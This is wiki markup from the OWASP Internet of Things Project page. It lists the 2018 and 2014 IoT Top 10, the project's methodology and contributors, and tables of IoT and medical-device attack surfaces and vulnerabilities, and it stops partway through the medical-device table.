The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
